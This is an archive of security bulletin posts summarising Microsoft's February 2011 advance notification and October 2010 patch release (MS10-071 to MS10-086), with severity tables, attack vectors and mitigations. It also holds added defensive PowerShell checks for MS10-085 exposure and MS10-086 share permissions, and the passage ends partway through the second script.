Category archive: Security Bulletin

ADVANCE NOTIFICATION – February 2011 Microsoft Security Bulletin Release

In its Security Bulletin Advance Notification for February 2011, Microsoft has announced a total of 12 new security bulletins (listed below by severity and security impact). Release of the new security updates is planned for 08.02.11.

German-language information will be available shortly at: http://www.microsoft.com/germany/technet/sicherheit/bulletins/aktuell/default.mspx.

Further general information on the Microsoft Security Bulletin Advance Notifications can be found here: http://www.microsoft.com/germany/technet/sicherheit/bulletins/bulletinadvance.mspx

What is the purpose of this alert?

As part of the monthly security bulletin release cycle, Microsoft provides advance notification to our customers concerning the number of new security updates being released, the products affected, the aggregate maximum severity, and information about detection tools relevant to the update. This is intended to help our customers plan for the deployment of these security updates more effectively.

On February 08, 2011, Microsoft is planning to release 12 new security bulletins. Below is a summary.

New Bulletin Summary

| Bulletin ID | Maximum Severity Rating | Vulnerability Impact | Restart Requirement | Affected Software* |
|---|---|---|---|---|
| Bulletin 1 | Critical | Remote Code Execution | Requires restart | Internet Explorer on Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| Bulletin 2 | Critical | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008. |
| Bulletin 3 | Critical | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| Bulletin 4 | Important | Remote Code Execution | May require restart | Microsoft Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| Bulletin 5 | Important | Denial of Service | Requires restart | Microsoft Windows Server 2003 |
| Bulletin 6 | Important | Remote Code Execution | May require restart | Microsoft Visio 2002, Visio 2003, and Visio 2007. |
| Bulletin 7 | Important | Information Disclosure | May require restart | Microsoft Windows 7 and Windows Server 2008 R2. |
| Bulletin 8 | Important | Elevation of Privilege | Restart required | Microsoft Windows XP and Windows Server 2003. |
| Bulletin 9 | Important | Elevation of Privilege | Restart required | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| Bulletin 10 | Important | Elevation of Privilege | Restart required | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| Bulletin 11 | Important | Elevation of Privilege | Restart required | Microsoft Windows XP, Windows Server 2003, Windows 7, and Windows Server 2008 R2. |
| Bulletin 12 | Important | Elevation of Privilege | Restart required | Microsoft Windows XP and Windows Server 2003. |

* The list of affected software in the summary table is an abstract. To see the full list of affected components please click on the "Advance Notification Webpage" link below and review the "Affected Software" section.

Although we do not anticipate any changes, the number of bulletins, products affected, restart information, and severities are subject to change until released.

Advance Notification Webpage: The full version of the Microsoft Security Bulletin Advance Notification for this month can be found at http://www.microsoft.com/technet/security/bulletin/ms11-feb.mspx.

Microsoft Windows Malicious Software Removal Tool: Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services, and the Download Center.

Monthly Security Bulletin Webcast: To address customer questions on these bulletins Microsoft will host a webcast next Wednesday, February 09, 2011, at 11:00 A.M. Pacific Time (U.S. and Canada). Registration for this event and other details can be found at http://www.microsoft.com/technet/security/bulletin/summary.mspx.

At this time, no additional information on these bulletins, such as details regarding the vulnerability or severity, will be made available until the bulletins are published on Tuesday.

Regarding Information Consistency

We strive to provide you with accurate information in static (this mail) and dynamic (web-based) content. Microsoft’s security content posted to the web is occasionally updated to reflect late-breaking information. If this results in an inconsistency between the information here and the information in Microsoft’s web-based security content, the information in Microsoft’s web-based security content is authoritative.

If you have any questions regarding this alert please contact your Technical Account Manager or Application Development Consultant.

Thank you,

Microsoft CSS Security Team

October 2010 Microsoft Security Bulletin Release

The Microsoft Security Bulletins for October 2010 have been released. The release of the bulletins replaces the Bulletin Advance Notification that was first announced on 07.10.10.

Further information is given below and is also available online at: http://www.microsoft.com/germany/technet/sicherheit/bulletins/ms10-oct.mspx (German)

In the table below, this month's security bulletins are ordered by severity.

On Wednesday, 13.10.10, at 20:00 (CET), Microsoft will hold an English-language webcast to answer questions about these bulletins. Register now for the October Security Bulletin webcast. Afterwards, the webcast will be available on demand.

Further information is available under Microsoft Security Bulletin Summaries and Webcasts.

What is the purpose of this alert?

This alert is to provide you with an overview of the new security bulletin(s) being released on October 12, 2010. Security bulletins are released monthly to resolve critical vulnerabilities.

New Security Bulletins

Microsoft is releasing the following sixteen (16) new security bulletins for newly discovered vulnerabilities:

| Bulletin ID | Bulletin Title | Max Severity Rating | Vulnerability Impact | Restart Requirement | Affected Software |
|---|---|---|---|---|---|
| MS10-071 | Cumulative Security Update for Internet Explorer (2360131) | Critical | Remote Code Execution | Requires restart | Internet Explorer on Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-072 | Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048) | Important | Information Disclosure | May require restart | Microsoft Windows SharePoint Services 3.0, SharePoint Foundation 2010, Office SharePoint Server 2007, Groove Server 2010, and Office Web Apps. |
| MS10-073 | Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) | Important | Elevation of Privilege | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-074 | Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution (2387149) | Moderate | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-075 | Vulnerability in Media Player Network Sharing Service Could Allow Remote Code Execution (2281679) | Critical | Remote Code Execution | May require restart | Microsoft Windows Vista and Windows 7. |
| MS10-076 | Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (982132) | Critical | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-077 | Vulnerability in .NET Framework Could Allow Remote Code Execution (2160841) | Critical | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-078 | Vulnerabilities in the OpenType Font (OTF) Format Driver Could Allow Elevation of Privilege (2279986) | Important | Elevation of Privilege | Requires restart | Microsoft Windows XP and Windows Server 2003. |
| MS10-079 | Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2293194) | Important | Remote Code Execution | May require restart | Microsoft Office Word 2002, Word 2003, Word 2007, Word 2010, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac, Word Viewer, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats, Office Web Apps, and Word Web App. |
| MS10-080 | Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2293211) | Important | Remote Code Execution | May require restart | Microsoft Excel 2002, Excel 2003, Excel 2007, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac, Excel Viewer, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats. |
| MS10-081 | Vulnerability in Windows Common Control Library Could Allow Remote Code Execution (2296011) | Important | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-082 | Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111) | Important | Remote Code Execution | May require restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-083 | Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution (2405882) | Important | Remote Code Execution | Requires restart | Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-084 | Vulnerability in Windows Local Procedure Call Could Cause Elevation of Privilege (2360937) | Important | Elevation of Privilege | Requires restart | Microsoft Windows XP and Windows Server 2003. |
| MS10-085 | Vulnerability in SChannel Could Allow Denial of Service (2207566) | Important | Denial of Service | Requires restart | Microsoft Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. |
| MS10-086 | Vulnerability in Windows Shared Cluster Disks Could Allow Tampering (2294255) | Moderate | Tampering | Requires restart | Microsoft Windows Server 2008 R2. |

* The list of affected software above is an abstract. To see the full list of affected components please visit the bulletin at the link provided in the left column and review the "Affected Software" section.

Summaries for new bulletin(s) may be found at http://www.microsoft.com/technet/security/bulletin/MS10-oct.mspx.

Microsoft Windows Malicious Software Removal Tool

Microsoft is releasing an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Server Update Services (WSUS), Windows Update (WU), and the Download Center. Information on the Microsoft Windows Malicious Software Removal Tool is available at http://support.microsoft.com/?kbid=890830.

High Priority Non-Security Updates

High-priority non-security updates that Microsoft releases on Microsoft Update (MU), Windows Update (WU), or Windows Server Update Services (WSUS) will be detailed in the KB article found at http://support.microsoft.com/?id=894199.

Public Bulletin Webcast

Microsoft will host a webcast to address customer questions on these bulletins:

Title: Information about Microsoft October Security Bulletins (Level 200)

Date: Wednesday, October 13, 2010, 11:00 A.M. Pacific Time (U.S. and Canada)

URL: http://msevents.microsoft.com/CUI/WebCastEventDetails.aspx?EventID=1032454437

New Security Bulletin Technical Details

In the following tables of affected and non-affected software, software editions that are not listed are past their support lifecycle. To determine the support lifecycle for your product and edition, visit the Microsoft Support Lifecycle web site at http://support.microsoft.com/lifecycle/.

Bulletin Identifier

Microsoft Security Bulletin MS10-071

Bulletin Title

Cumulative Security Update for Internet Explorer (2360131)

Executive Summary

This security update resolves seven privately reported vulnerabilities and three publicly disclosed vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted Web page using Internet Explorer.

The security update addresses these vulnerabilities by modifying the way that Internet Explorer handles objects in memory, CSS special characters, HTML sanitization, the AutoComplete feature, the Anchor element, and script during certain processes.

Severity Ratings and Affected Software

· This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows clients;

· This security update is rated Important for Internet Explorer 6, Internet Explorer 7, and Internet Explorer 8 on Windows servers.

Attack Vectors

· A maliciously crafted Web Page

· A maliciously crafted email message

Mitigating Factors

· An attacker would have no way to force users to visit a malicious Web site.

· By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode, known as Enhanced Security Configuration.

· By default, all supported versions of Outlook, Outlook Express, and Windows Mail open HTML email messages in the Restricted sites zone.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user – users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-053

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-071.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-072

Bulletin Title

Vulnerabilities in SafeHTML Could Allow Information Disclosure (2412048)

Executive Summary

This security update resolves one publicly disclosed vulnerability and one privately reported vulnerability in Microsoft SharePoint and Windows SharePoint Services. The vulnerabilities could allow information disclosure if an attacker submits specially crafted script to a target site using SafeHTML.

The update addresses the vulnerabilities by modifying the way that SafeHTML sanitizes HTML content.

Severity Ratings and Affected Software

This security update is rated Important for Microsoft SharePoint Services 3.0, Microsoft SharePoint Foundation 2010, Microsoft Office Web Apps, all supported editions of Microsoft Office SharePoint Server 2007, and Microsoft Groove Server 2010.

Attack Vectors

An attacker submits a specially crafted script to a target site using SafeHTML.

Mitigating Factors

Microsoft has not identified any mitigations for CVE-2010-3324. For the second vulnerability, CVE-2010-3243, only sites that use SafeHTML to sanitize HTML are potentially affected.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

MS10-039

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-072.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-073

Bulletin Title

Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957)

Executive Summary

This security update resolves several publicly disclosed vulnerabilities in the Windows kernel-mode drivers. The most severe of these vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application.

The security update addresses the vulnerabilities by correcting the manner in which the Windows kernel-mode drivers maintain the reference count for an object, index a table of function pointers when loading a keyboard layout from disk, and validate window class data.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Microsoft Windows.

Attack Vectors

· A malicious user logon.

· A maliciously crafted application.

· A maliciously crafted script.

Mitigating Factors

An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-048

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-073.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-074

Bulletin Title

Vulnerability in Microsoft Foundation Classes Could Allow Remote Code Execution (2387149)

Executive Summary

This security update resolves a publicly disclosed vulnerability in the Microsoft Foundation Class (MFC) Library. The vulnerability could allow remote code execution if a user is logged on with administrative user rights and opens an application built with the MFC Library. An attacker who successfully exploited this vulnerability could obtain the same permissions as the currently logged-on user. If a user is logged on with administrative user rights, an attacker could take complete control of the affected system.

The security update addresses the vulnerability by adding additional checks to requests for window title changes.

Severity Ratings and Affected Software

This security update is rated Moderate for all supported releases of Microsoft Windows.

Attack Vectors

· A window title change based on network input such as in a chat application or a web browser.

· A window title change based on the content of a file opened with the MFC application.

· A specially crafted file with a specific MFC application installed on the user’s system.

Mitigating Factors

An attacker who successfully exploited this vulnerability could obtain the same permissions as the currently logged-on user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

For Windows Server 2003 SP2: MS07-012

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-074.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-075

Bulletin Title

Vulnerability in Media Player Network Sharing Service Could Allow Remote Code Execution (2281679)

Executive Summary

This security update resolves a privately reported vulnerability in the Microsoft Windows Media Player Network Sharing Service. The vulnerability could allow remote code execution if an attacker sent a specially crafted RTSP packet to an affected system.

The security update addresses the vulnerability by correcting the way that Windows Media Player Network Sharing Service handles specially crafted RTSP packets.

Severity Ratings and Affected Software

This security update is rated Critical for supported editions of Windows 7 and Important for all supported editions of Windows Vista.

Attack Vectors

Maliciously crafted network packets.

Mitigating Factors

· Internet access to home media is disabled by default. In this default configuration, the vulnerability can be exploited only by an attacker within the same subnet.

· On supported editions of Windows Vista and on Windows 7 Professional, Windows 7 Enterprise, and Windows 7 Ultimate editions, the Windows Media Player Network Sharing Service is not enabled by default.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-075.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-076

Bulletin Title

Vulnerability in the Embedded OpenType Font Engine Could Allow Remote Code Execution (982132)

Executive Summary

This security update resolves a privately reported vulnerability in a Microsoft Windows component, the Embedded OpenType (EOT) Font Engine. The vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could take complete control of an affected system remotely.

The security update addresses the vulnerability by correcting the way that the Embedded OpenType Font Engine parses files and content containing embedded fonts.

Severity Ratings and Affected Software

This security update is rated Critical for all supported releases of Microsoft Windows.

Attack Vectors

· A maliciously crafted Office document.

· A maliciously crafted Web page.

· A maliciously crafted email.

Mitigating Factors

· In the Web-based attack scenario, users would have to be persuaded to visit a malicious Web site.

· Exploitation only gains the same user rights as the logged on account – users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-076.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-077

Bulletin Title

Vulnerability in .NET Framework Could Allow Remote Code Execution (2160841)

Executive Summary

This security update resolves a privately reported vulnerability in Microsoft .NET Framework. The vulnerability could allow remote code execution on a client system if a user views a specially crafted Web page using a Web browser that can run XAML Browser Applications (XBAPs). The vulnerability could also allow remote code execution on a server system running IIS, if that server allows processing ASP.NET pages and an attacker succeeds in uploading a specially crafted ASP.NET page to that server and then executes the page, as could be the case in a Web hosting scenario.

The security update addresses the vulnerability by modifying the way that the JIT compiler optimizes code.

Severity Ratings and Affected Software

This security update is rated Critical for Microsoft .NET Framework 4.0 on supported x64-based and Itanium-based editions of Microsoft Windows.

Attack Vectors

· A maliciously crafted Web page.

· An uploaded malicious ASP.NET application that would be used to break out of the sandbox in a Web hosting environment.

Mitigating Factors

· By default, Internet Explorer on Windows Server 2003 and Windows Server 2008 runs in a restricted mode that is known as Enhanced Security Configuration.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user or the user account of ASP.NET. Users or accounts that are configured to have fewer user rights on the system could be less impacted than users or accounts that operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail or Instant Messenger message that takes users to the attacker’s Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-077.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-078

Bulletin Title

Vulnerabilities in the OpenType Font (OTF) Format Driver Could Allow Elevation of Privilege (2279986)

Executive Summary

This security update resolves two privately reported vulnerabilities in the Windows OpenType Font (OTF) format driver. The vulnerabilities could allow elevation of privilege if a user views content rendered in a specially crafted OpenType font.

The security update addresses the vulnerabilities by correcting the way the OpenType Font (OTF) format driver allocates memory and performs integer calculations when processing OpenType fonts.

Severity Ratings and Affected Software

· This security update is rated Important for all supported editions of Windows XP and Windows Server 2003.

· Note: All supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are not affected by the vulnerability.

Attack Vectors

· A malicious user logon

· A maliciously crafted application

· A maliciously crafted script

Mitigating Factors

· An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. The vulnerability could not be exploited remotely or by anonymous users.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-037

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-078.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-079

Bulletin Title

Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2293194)

Executive Summary

This security update resolves eleven privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Word file.

The update addresses the vulnerabilities by modifying the way that Microsoft Office Word parses specially crafted Word files.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Microsoft Word 2002, Microsoft Word 2003, Microsoft Word 2007, Microsoft Word 2010, Microsoft Office 2004 for Mac, and Microsoft Office 2008 for Mac; Open XML File Format Converter for Mac; and all supported versions of Microsoft Office Word Viewer and Microsoft Office Compatibility Pack.

Attack Vectors

A maliciously crafted Word document. Common delivery mechanisms: a maliciously crafted Web page, an email attachment, an instant message, a peer-to-peer file share, a network share, and/or a USB thumb drive.

Mitigating Factors

· The vulnerability cannot be exploited automatically through email. For an attack to be successful, a user must open an attachment that is sent in an email message.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

· MS10-056

· For the Microsoft Word Viewer: MS09-068

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-079.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-080

Bulletin Title

Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2293211)

Executive Summary

This security update resolves thirteen privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user opens a specially crafted Excel file or a specially crafted Lotus 1-2-3 file.

The update addresses the vulnerabilities by changing the way that Microsoft Office Excel parses specially crafted Excel files and specially crafted Lotus 1-2-3 files.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Microsoft Excel 2002, Microsoft Excel 2003, Microsoft Excel 2007, Microsoft Office 2004 for Mac, and Microsoft Office 2008 for Mac; Open XML File Format Converter for Mac; and all supported versions of Microsoft Office Excel Viewer and Microsoft Office Compatibility Pack.

Attack Vectors

A maliciously crafted Excel spreadsheet. Common delivery mechanisms: a maliciously crafted Web page, an email attachment, an instant message, a peer-to-peer file share, a network share, and/or a USB thumb drive.

Mitigating Factors

· The vulnerability cannot be exploited automatically through email. For an attack to be successful, a user must open an attachment that is sent in an email message.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

MS10-038 and MS10-057

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-080.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-081

Bulletin Title

Vulnerability in Windows Common Control Library Could Allow Remote Code Execution (2296011)

Executive Summary

This security update resolves a privately reported vulnerability in the Windows common control library. The vulnerability could allow remote code execution if a user visited a specially crafted Web page. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system.

The security update addresses the vulnerability by correcting the manner in which the Windows common controls handle messages passed from a third-party scalable vector graphics (SVG) viewer.

Severity Ratings and Affected Software

This security update is rated Important for all supported releases of Microsoft Windows.

Attack Vectors

A maliciously crafted Web page.

Mitigating Factors

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-081.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-082

Bulletin Title

Vulnerability in Windows Media Player Could Allow Remote Code Execution (2378111)

Executive Summary

This security update resolves a privately reported vulnerability in Windows Media Player. The vulnerability could allow remote code execution if Windows Media Player opened specially crafted media content hosted on a malicious Web site.

The security update addresses the vulnerability by correcting the manner in which Windows Media Player deallocates objects during a reload operation.

Severity Ratings and Affected Software

· This security update is rated Important for Windows Media Player 9 Series, Windows Media Player 10, Windows Media Player 11, and Windows Media Player 12 when installed on supported releases of Microsoft Windows except for Windows Server 2008 and Windows Server 2008 R2.

· This security update is rated Moderate for Windows Media Player 11 and Windows Media Player 12 when installed on supported editions of Windows Server 2008 and Windows Server 2008 R2.

· Note: All supported Itanium-based editions of Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2 are not affected by the vulnerability.

Attack Vectors

A maliciously crafted Web page.

Mitigating Factors

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

· An attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site.

Restart Requirement

This update may require a restart.

Bulletins Replaced by This Update

For Windows Media Player 9 Series on Windows XP: MS10-027

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-082.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-083

Bulletin Title

Vulnerability in COM Validation in Windows Shell and WordPad Could Allow Remote Code Execution (2405882)

Executive Summary

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user opens a specially crafted file using WordPad or selects or opens a shortcut file that is on a network or WebDAV share.

The security update addresses the vulnerability by correcting the way that the Windows Shell and WordPad validate COM objects.

Severity Ratings and Affected Software

This security update is rated Important for all supported releases of Microsoft Windows.

Attack Vectors

· A maliciously crafted WordPad file.

· A malicious shortcut file.

Mitigating Factors

· The vulnerability cannot be exploited automatically through email. For an attack to be successful, a user must open an attachment that is sent in an email message.

· An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

None

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-083.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-084

Bulletin Title

Vulnerability in Windows Local Procedure Call Could Cause Elevation of Privilege (2360937)

Executive Summary

This security update resolves a publicly disclosed vulnerability in Microsoft Windows. The vulnerability could allow elevation of privilege if an attacker logs on to an affected system and runs specially crafted code that sends an LPC message to the local LRPC Server. The message could then allow an authenticated user to access resources that are running in the context of the Network Service account.

The security update addresses the vulnerability by modifying the way LRPC port messages are handled within the RPC subsystem.

Severity Ratings and Affected Software

· This security update is rated Important for all supported editions of Windows XP and Windows Server 2003.

· Note: None of the supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 is affected by the vulnerability.

Attack Vectors

· A malicious user logon

· A maliciously crafted application

· A maliciously crafted script

Mitigating Factors

· An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability.

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-066

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-084.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-085

Bulletin Title

Vulnerability in SChannel Could Allow Denial of Service (2207566)

Executive Summary

This security update resolves a privately reported vulnerability in the Secure Channel (SChannel) security package in Windows. The vulnerability could allow denial of service if an affected Internet Information Services (IIS) server hosting a Secure Sockets Layer (SSL)-enabled Web site received a specially crafted packet.

The security update addresses the vulnerability by changing the way that IIS processes client certificate requests.

Severity Ratings and Affected Software

This security update is rated Important for all supported editions of Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

Attack Vectors

A remote, anonymous attacker could send a specially crafted network packet to the affected system that would cause the LSASS service to stop responding and the system to restart.

Mitigating Factors

· Systems are only affected if SSL is enabled, which is not a default configuration.

· By default, IIS is not configured to host SSL Web sites.

· The system will automatically restart after a successful attack, allowing the system to recover.
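The two mitigating factors above reduce to one question per host: is IIS serving https at all, and is KB2207566 (the update this bulletin ships) installed? The PowerShell below is an added check written for this page, not part of the bulletin; the function name, the output fields, and the use of KB2207566 as the "patched" marker are its own assumptions, and the WebAdministration module or snap-in only exists where IIS is installed.

```powershell
# Added example, not from the bulletin: is this host exposed to MS10-085?
# Exposed = IIS has an https binding (or HTTP.SYS has an SSL certificate bound) AND KB2207566 is missing.
function Test-Ms10085Exposure {
    param([string]$KB = 'KB2207566')   # assumption: the KB number in the bulletin title

    # Get-HotFix reads Win32_QuickFixEngineering, which only knows updates installed through
    # Windows Update / WUSA / MSU, so "not patched" can be a false alarm on hosts patched another way.
    $patched = [bool](Get-HotFix -Id $KB -ErrorAction SilentlyContinue)

    # https bindings as IIS sees them. Windows 7 / Server 2008 R2 ship the WebAdministration module;
    # Vista / Server 2008 need the separately installed IIS 7.0 PowerShell snap-in.
    $httpsBindings = @()
    if (Get-Module -ListAvailable -Name WebAdministration) {
        Import-Module WebAdministration
        $httpsBindings = @(Get-WebBinding -Protocol https)
    } elseif (Get-PSSnapin -Registered -Name WebAdministration -ErrorAction SilentlyContinue) {
        Add-PSSnapin WebAdministration
        $httpsBindings = @(Get-WebBinding -Protocol https)
    }

    # Independent of the IIS tooling: certificates bound in HTTP.SYS, which is what SChannel actually serves.
    # Each binding prints one "IP:port : a.b.c.d:443" line.
    $sslCerts = @(netsh http show sslcert | Select-String -Pattern '^\s*IP:port')

    New-Object PSObject -Property @{
        ComputerName    = $env:COMPUTERNAME
        Patched         = $patched
        HttpsBindings   = $httpsBindings.Count
        HttpSysSslCerts = $sslCerts.Count
        Exposed         = (-not $patched) -and ($httpsBindings.Count -gt 0 -or $sslCerts.Count -gt 0)
    }
}

Test-Ms10085Exposure | Format-List ComputerName, Patched, HttpsBindings, HttpSysSslCerts, Exposed
```

A host that reports Exposed = False because it has no SSL binding is only safe until someone adds one; the update should still be deployed, the check just tells you which hosts to do first.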

Restart Requirement

This update requires a restart.

Bulletins Replaced by This Update

MS10-049

Full Details

http://www.microsoft.com/technet/security/bulletin/MS10-085.mspx

Bulletin Identifier

Microsoft Security Bulletin MS10-086

Bulletin Title

Vulnerability in Windows Shared Cluster Disks Could Allow Tampering (2294255)

Executive Summary

This security update resolves a privately reported vulnerability in Windows Server 2008 R2 when used as a shared failover cluster. The vulnerability could allow data tampering on the administrative shares of failover cluster disks. This vulnerability only applies to the cluster disks used in a failover cluster. The security update addresses this vulnerability by changing the way the Microsoft Cluster Service (MSCS) user interface sets permissions on administrative shares when adding or creating new shared cluster disks. Note: This update will not fix permissions on existing cluster disk shares.

Severity Ratings and Affected Software

This security update is rated Moderate for all supported editions of Windows Server 2008 R2.

Attack Vectors

When an administrator adds a disk to a failover cluster, the Failover Cluster Manager sets permissions on the administrative shares of that cluster disk in a way that can give unauthorized users (the Everyone group) read, write and delete access to those shares.

Mitigating Factors

By default, Windows Server 2008 R2 servers are not affected: Failover Clustering is an optional feature that is not installed by default, and only disks that have been added to a failover cluster are exposed.
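Because the update only changes how new cluster disks are shared and leaves existing shares as they are, a cluster that already exists needs an audit. The PowerShell below is an added example written for this page, not from the bulletin: it reads every share's DACL through WMI and reports entries that give Everyone (or, as this example's own choice, Authenticated Users) any write or delete right. The function name, the trustee list and the set of "dangerous" access-mask bits are its own assumptions.

```powershell
# Added example, not from the bulletin: find shares on this node whose DACL grants Everyone
# (or Authenticated Users) write or delete rights, the condition MS10-086 describes.
# Run it on every cluster node: a clustered disk's shares only exist on the node that currently owns it.
function Get-OverPermissiveShareAces {
    param(
        [string]$ComputerName = '.',
        # Everyone (S-1-1-0) is what the bulletin names; Authenticated Users (S-1-5-11) is nearly as broad.
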